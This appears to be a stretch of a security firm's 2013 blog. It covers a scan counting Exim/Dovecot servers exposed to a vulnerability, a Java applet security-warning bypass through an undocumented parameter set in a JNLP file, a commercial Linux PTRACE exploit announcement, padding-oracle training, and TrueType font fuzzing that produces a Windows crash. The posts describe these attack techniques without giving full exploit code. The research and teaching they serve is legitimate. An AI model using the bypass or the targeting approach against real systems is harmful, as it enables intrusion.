2,086,479 50,533 69,433 36,557 72.3%
1,668,143 629 11869 324 51.1%
753,486 22019 24494 20157 91.5%

* IPs that returned results from a SWARM module, a subset of all hosts scanned for that job
** We counted unique hosts that had at least one Dovecot banner on either IMAP or POP3


  1. We did not look at IMAPS or SSL-POP
  2. If Exim and Dovecot are not run on the same server it wouldn't be included in our results
  3. If IMAP/POP3 are run on non-standard ports it wouldn't be included in our results
  4. We did not confirm the presence of the vulnerability beyond banner parsing
  5. According to RTP the errant config was introduced in 2009, we could also filter by the presence of dovecot versions released only after 2009. Though this wouldn't take into account configurations that had remained static through upgrades

When running Exim and IMAP/POP3, Dovecot is an extremely popular choice for an LDA. I think it's fair to say that a majority of administrators would reference the Dovecot wiki or documentation when configuring this setup. As a result this vulnerability is probably present on over a hundred thousand servers. Interestingly there is a lot of regional variance for both Exim and Dovecot, though in all Dovecot appears to be more popular in our data.
Pulling this data out with SWARM was pretty easy and it gave me a rough idea of the impact of the vulnerability. Some folks only rely on the CVSS score but fail to see the larger picture. If you have reliable unauthenticated remote code execution on Bob's Fancy FTP Server that would probably score a 10 on the CVSS scale. But if there are 15 total installs of that software anywhere on the planet, the impact is going to be minimal.

Also, after the fact I learned that Mongo has a built in MapReduce which I need to learn how to use :-/

Wednesday, April 24, 2013

Yet Another Java Security Warning Bypass

Not so long ago we posted about a JavaSecurity Warning bypass that used a serialized applet instance.
That bypass was fixed in Java 7 update 13 so we had to keep looking at new ways of defeating the warning pop-up that requires user interaction in order to run applets.

We continued auditing the code that performed the checks when starting an applet and ended up arriving at the method “sun.plugin2.main.client.PluginMain.performSSVValidation(Plugin2Manager)

This method will end up calling some other methods in the com.sun.javaws.ui.SecureStaticVersioning class that will show us that annoying security warning pop up.

But just take a quick look at the performSSVValidation method implementation:

What is that __applet_ssv_validated parameter??

Obviously this is an internal undocumented parameter and, as you can see, it turns out that if it is set to true, no checks are performed.

The first thing we tried was to simply set that parameter to true in our evil applet, but it didn't work.
While debugging we noticed that the parameter was not set on the applet despite our setting it to true.

Basically sun.plugin2.main.server.MozillaPlugin.addParameter(String, String) is filtering the parameters:

But as you may know, Java provides another way of launching applets in a browser besides using the applet, object or embed tags.
Java Web Start technology is what we can use.
Now the applet description is provided by using a JNLP file and parameters can be set to the applet by using the <param> tag.

We can see that when using Java Web Start, the performSSVValidation method is also called

So lets try to launch an applet with Java Web Start and set the __applet_ssv_validated parameter to true with a JNLP file like this one:

And by know you have already realized that this just works and parameters are not filtered.
The Security Warning pop-up message is not displayed and our applet happily runs!

Ironically on Tuesday 16th April, exactly while I was at the Infiltrate MasterClass  teaching how to audit and exploit Java, Oracle released update 21 which fixed this bypass and a ton of others.

The time investment for stealthily exploiting Java is increasing but finding bypasses like this makes it worth the time!

Esteban Guillardoy

Monday, March 18, 2013


I win at the demo-run of Immunity Web Hacking class today. Who want to try to be "superuser" ? 

Friday, March 15, 2013

Immunity Releases an Exploit for the Linux Kernel PTRACE vulnerability

Linux PTRACE CVE_2013_0871

Solar Designer calls this one of the more dangerous Linux local exploits since  CVE-2010-3081. (c.f. )

There's some contention over how easy it is to exploit, and like many race conditions, it's not simple. Our current version works on 64 bit kernels in VM's (which have not been patched). To be perfectly honest, we largely tested this on VMWare VMs, so on other hypervisors YMMV.

2.6.29 changed the creds structure, so currently our released exploit is only 2.6.29 or greater. We do have a 32 bit version and a 2.x version which we'll finish testing and release at some point in the near future. And we'll try to fix the 64 bit version to work on non-VM's. It's going to be a while until this hits normal CANVAS as we need to finish 64-bit Linux MOSDEF in order to integrate it properly.

That said, VM's are in fairly common use at the moment so we thought people would get value out of it as-is.


Exploit discussed in this blog post is here:

Of course, you'll need a CANVAS Early Updates subscription to download this. You can email if you don't have one.

Thursday, March 14, 2013

Hacking the web: Exploiting CBC with Padding Oracle

The process of writing the material of a training is very organic. Not in the way where you replace meat with tofu, but rather a process of evolving the material for each new edition.

No matter how experienced a teacher can be on the subject, students learning process are different for everyone and so is their background experience. In short, building training that is effective for a large range of people is as hard as building an exploit that is effective against a large range of machines.

That's why after each edition we try to re-write what we think are the weakest parts to make the training more targeted towards how students learn best.

As a good example, last year the Web Hacking class had a Padding Oracle section. Not only it was very a novel technique, but we where seeing all kind of bad implementations on our consulting gigs that we were exploiting with this. We decide it to rush it into our class, and fit it into a two hours period. Whether most people in the class understood it and was able to exploit it at the end, we felt that they might have not have grasped the whole concept, so this year we decide it to turn it in a whole Web Crypto day.

Importantly, we decided to build an interactive framework for ECB and CBC (if you're not sure the difference, you should attend the class!), so you could understand how to exploit Padding Oracle in a Web 2.0 environment.

It was painful, but the results are looking good:

Kudos to Matias for the great work, and we are hoping to see you there in less than a month at INFILTRATE 2013's Web Hacking class!

Monday, March 11, 2013

Infiltrate Preview - TrueType Font Fuzzing and Vulnerability

TrueType font files are made up of a number of tables; each table begins on a 4 byte boundary that comprises an outline font and must be long aligned and padded with zeroes if necessary. Referring to the “TrueType 1.0 Font File Technical Specification”, provided by Microsoft; the TrueType font file begins at byte 0 with the Offset Table. Offset Table is divided into 5 subtable:

sfnt version : 65536(0x0001 0000) for version 1.0
numTables : Number of tables
searchRange : (Maximum power of 2 ≤ numTables) x 16
entrySelector : Log2(Maximum power of 2 ≤ numTables)
rangeShift : numTables x 16 – searchRange

Beginning at byte 12, after the Offset Table, is the Font Table Directory. Entries in the Table Directory must be sorted in ascending order by ‘tag’ name. Overall, the Font Table Directory Header consists of:

tag : 4 byte identifier
checkSum : checksum of the table
offset : Beginning offset of the font table entry
length : Length of the table

The Structure of True Type Font Directory

The required tables in the Font Table Directory:

cmap : character to glyph mapping
glyf : glyph data
head : font header
hhea : horizontal header
hmtx : horizontal metrics
loca : index to location 
maxp : maximum profile
name : naming table
post : PostScript information
OS/2 : OS/2 and Windows specific metrics

The optional tables in the Font Table Directory:

cvt : Control Value Table
EBDT : Embedded bitmap data
EBLC : Embedded bitmap location data
EBSC : Embedded bitmap Scaling data
fpgm : font program
gasp : grid-fitting and scan conversion procedure
hdmx : horizontal device metrics
kern : kerning
LTSH : Linear threshold table
prep : CVT Program
VDMX : Vertical Metrics header
vhea : Vertical Metrics

Due to font validation purposes, the dumb fuzzing technique is not recommended for these fields: ‘checkSum’, ‘offset’, ‘length’ and ‘Table’. To reduce the number of irrelevant tests, a checksum validation program is used to determine the checksum of ‘head’ table.

Fix the Checksum value of the “head” Font Table Directory

During the fuzzing process, the table checksum has to re-compute. The checksum calculation implies 4 byte boundaries as shown in Python program below:


Our font fuzzer is to fuzz the TrueType font file into different sizes which enables the generation of the test cases to determine the size of font in triggering the vulnerability. Each fuzzing process starts with automating the installation of the mutated font in Windows system. It will then display the font; both in open the font file via fontview.exe and displaying the character maps. Lastly, uninstall the font and repeat the process if no vulnerability is found.

The windll.gdi32.AddFontResourceExA function is used to automate the installation of the crafted font into the “C:\Windows\Fonts” folder.

htr = windll.gdi32.AddFontResourceExA(FileFont, FR_PRIVATE, None)

Once the fuzzing environment is ready, a LOGFONT object is created to define the attributes of a font. 


Assuming no vulnerability has been found at a font with a specified size that has been called; the windll.gdi32.RemoveFontResourceExW function will be called to remove the fonts in “C:\Windows\Fonts” folder.

windll.gdi32.RemoveFontResourceExW(fileFont, FR_PRIVATE, None)

Another size of font in the range that has been set will be called and the same process will repeat until vulnerability is found or the list of font size elements under a loop function has all been called and no vulnerability is found.

Figure below shows the Blue Screen of Death (BSOD) proof of concept via our font fuzzer. [Editor's note: BOOM! :>]

BSOD of Windows 8 Pro 

The details of the fuzzer and findings will be discussed in the talk. Looking forward to see you guys in INFILTRATE 2013.

--- Ling Chuan Lee & Lee Yee Chan from F13 Labs